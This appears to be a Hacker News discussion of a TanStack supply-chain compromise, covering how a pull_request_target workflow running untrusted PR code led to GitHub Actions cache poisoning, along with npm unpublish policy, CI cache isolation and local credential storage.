The fundamental mistake here seems to have been not fully understanding the threat model of the pull_request_target action trigger.

pull_request_target jobs run in response to various events related to a pull request opened against your repo from a fork (e.g, someone opens a new PR or updates an existing one). Unlike pull_request jobs, which are read-only by default, pull_request_target jobs have read/write permissions.

The broader permissions of pull_request_target are supposed to be mitigated by the fact that pull_request_target jobs run in a checkout of your current default branch rather than on a checkout of the opened PR. For example, if someone opens a PR from some branch, pull_request_target runs on `main`, not on the new branch. The compromised action, however, checked out the source code of the PR to run a benchmark task, which resulted in running malicious attacker-controlled code in a context that had sensitive credentials.

The GHA docs warn about this risk specifically:

> Running untrusted code on the pull_request_target trigger may lead to security vulnerabilities. These vulnerabilities include cache poisoning and granting unintended access to write privileges or secrets.

They also further link to a post from 2021 about this specific problem: https://securitylab.github.com/resources/github-actions-prev.... That post opens with:

> TL;DR: Combining pull_request_target workflow trigger with an explicit checkout of an untrusted PR is a dangerous practice that may lead to repository compromise.

The workflow authors presumably thought this was safe because they had a block setting permissions.contents: read, but that block only affects the permissions for GITHUB_TOKEN, which is not the token used to interact with the cache. This seems like the biggest oversight in the existing GHA documentation/api (beyond the general unsafety of having pull_request_target at all). Someone could (and presumably did!) see that block and think "this job runs with read-only permissions", which wasn't actually true here.

user34283 3 hours ago|||
What I don't get is how the GitHub Action cache is shared between unprotected and protected refs. Is that really the case?

Why even have protected branch rules when anyone with write access to an unprotected branch can poison the Action cache and compromise the CI on the next protected branch run?

In GitLab CI caches are not shared between unprotected and protected runs.

consumer451 8 hours ago|||
From a GitHub product owner POV, if the architecture is not to be changed, what is the solution?

A big ugly warning in the UI?

Or, push back on the architecture?

Or, is threatening a big ugly warning in the UI actually pushing back on the architecture?

corvad 7 hours ago||
Many projects kind of take a different approach where for pull requests CI is not run until approvals from maintainers are given even for very simple jobs to avoid untrusted code running in ci.
corvad 7 hours ago||
At least my naive brain wonders if blocking force pushes to main would have stopped this as it is a setting in Github these days, unless I am misunderstanding the final attack vector since it seems it was force pushed.
ezekg 9 hours ago||
> Unpublish was unavailable for nearly all affected packages because of npm's "no unpublish if dependents exist" policy. We have to rely on npm security to pull tarballs server-side, which adds hours of delay during which malicious tarballs remain installable

Per https://docs.npmjs.com/policies/unpublish:

> If your package does not meet the unpublish policy criteria, we recommend deprecating the package. This allows the package to be downloaded but publishes a clear warning message (that you get to write) every time the package is downloaded, and on the package's npmjs.com page. Users will know that you do not recommend they use the package, but if they are depending on it their builds will not break. We consider this a good compromise between reliability and author control.

I don't even know what to say here, npm.

sophiabits 9 hours ago||
I do not envy the position the npm team are in. They removed the ability to unpublish packages as a response to the left-pad incident[1] because it wasn't desirable for individual developers to break downstream dependencies by pulling their package maliciously.

Of course the side effect is that now it's much harder to pull packages for legitimate reasons :/

[1] https://en.wikipedia.org/wiki/Npm_left-pad_incident

superfrank 6 hours ago|||
Maybe give publishers a way to quarantine versions with a warning that stops the install, but allows users can override if they choose to is the next step?

Give a publisher a way to tag a version as malicious and then in those hours between the exploit being noticed and the package being removed anyone who tries to install gets a message about that version being quarantined and asking whether they want to proceed.

It's not a perfect solution, but I think it's better than just waiting for NPM to take action without opening the door up to another left pad situation.

thayne 6 hours ago||||
I think cargo's yank is a good balance. It makes it difficult to pull the yanked version in as a dependency, but doesn't break existing usages, as long as the version is in the lockfile. And I think even then gives you a warning that you are using a yanked package.
zarzavat 8 hours ago||||
The obvious solution is that unpublish should be available within a time window after a new version is published and then unavailable after that.
beart 7 hours ago||
There is a time window - https://docs.npmjs.com/policies/unpublish
zarzavat 7 hours ago||
Yes but they didn't do it properly. They only allow unpublishing if there are no dependants, which means it can't be used to pull a package version for security reasons.

It should be that within the first X hours you can pull a version regardless of dependants, after that you should need approval.

ummonk 8 hours ago|||
I mean they brought that incident on themselves...
igregoryca 8 hours ago|||
The baffling part is why it takes hours for the npm security team to unpublish packages that contain malware, as attested by multiple independent sources? That should be able to happen in minutes.
linkregister 7 hours ago|||
It would take longer than minutes to validate the claims themselves.
consumer451 8 hours ago|||
Who vets the sources, and using what scheme?
tomjen3 6 hours ago||
If email matches owner of repo, pull now. If not verified, ban and restore later.
nabogh 8 hours ago||
Some sort of middle ground should have been found where the unpublished package is still accessible as an archive or something. I'd much rather get my package broken than get hacked
timwis 4 hours ago||
What do folks here do to avoid having plaintext credentials on disk? I try to use 1Password's plugins where I can. I find the SSH key (and got signing) experience flawless, but the cli experience (eg aws cli) pretty clunky - they often break, and they don't even have a gcp plugin last I checked.
Myzel394 3 hours ago||
I'm not a huge fan of 1Password, there have been way too many issues in the past with it. If you're on a Mac, I can highly recommend you to check out Secretive https://github.com/maxgoedjen/secretive
timwis 3 hours ago||
Love that feeling when you read through a repo and think, "Wow, this looks cool," and go to star it, and see that you already have, and clearly forgot about it

Anyway, thanks for sharing. It doesn't look like it handles cli auth though (aws, npm, etc. all leave tokens sitting in your home directory). What do you use for those?

pprotas 1 hour ago||
`sops` combined with `age` is great! Benefit is that it doesn't tie you into 1Password's ecosystem
timwis 1 hour ago||
That looks interesting, but unless I'm missing it, it still leaves you with things like ~/.aws/credentials in plaintext on disk, doesn't it?
Narretz 4 hours ago|
> Cache entry Linux-pnpm-store-6f9233a50def742c09fde54f56553d6b449a535adf87d4083690539f49ae4da11 (1.1 GB) saved to GitHub Actions cache for TanStack/router, scope refs/heads/main — keyed to match what release.yml will look up on the next push to main

Imo I think this shouldn't have been possible, as in release should use its own cache and rebuild the rest fresh. It's one thing that the main <> fork boundary was breached, but imo the release process should have run fresh without any caches. Of course hindsight is 20/20.

d3ng 3 hours ago||
Yes, surely this caching mechanism is undocumented and unexpected behavior?

Looking at the affected workflow I don't see any explicit caching so this is all "magically under the hood" by GitHub?

This looks like a FU on Github not TanStack (except for putting trust in Github in 2026 perhaps).

Yes, various footguns of pull_request_target are documented but I don't believe this is one of them? Github needs to own this OR just deprecate and remove pull_request_target alltogether.

From postmortem timeline: > 2026-05-11 11:29 Cache entry Linux-pnpm-store-6f9233a50def742c09fde54f56553d6b449a535adf87d4083690539f49ae4da11 (1.1 GB) saved to GitHub Actions cache for TanStack/router, scope refs/heads/main — keyed to match what release.yml will look up on the next push to main

Why was that scoped refs/heads/main?

This is the exploited version of the exploited workflow. Why does the result of preinstall scripts run on PRs here end up on the main branch? Or did I overlook some critical part of Actions docs or the TanStack actions?

https://raw.githubusercontent.com/TanStack/router/d296252f73...

d3ng 3 hours ago||
I take the above back. TanStack messed this up in the way they explicitly cache. This is run from the affected workflow: https://github.com/TanStack/config/blob/main/.github/setup/a...

The restore-key looks too wide and this still looks like an issue. This wide caching may also cause issue if they ever upgrade major nodejs version independently of OS, for example.

user34283 2 hours ago||
On GitLab even if you set the same cache key it will not cross between unprotected and protected runs.

GitLab just adds a -protected suffix to the cache key.

It seems baffling that GitHub does not do this trivial separation, if I understand it correctly.

febusravenga 3 hours ago||
I think more proper solution is to limit writes of untrusted actions - they shouldn't be allowed to update cache. Only read - for perf reasons.
More comments...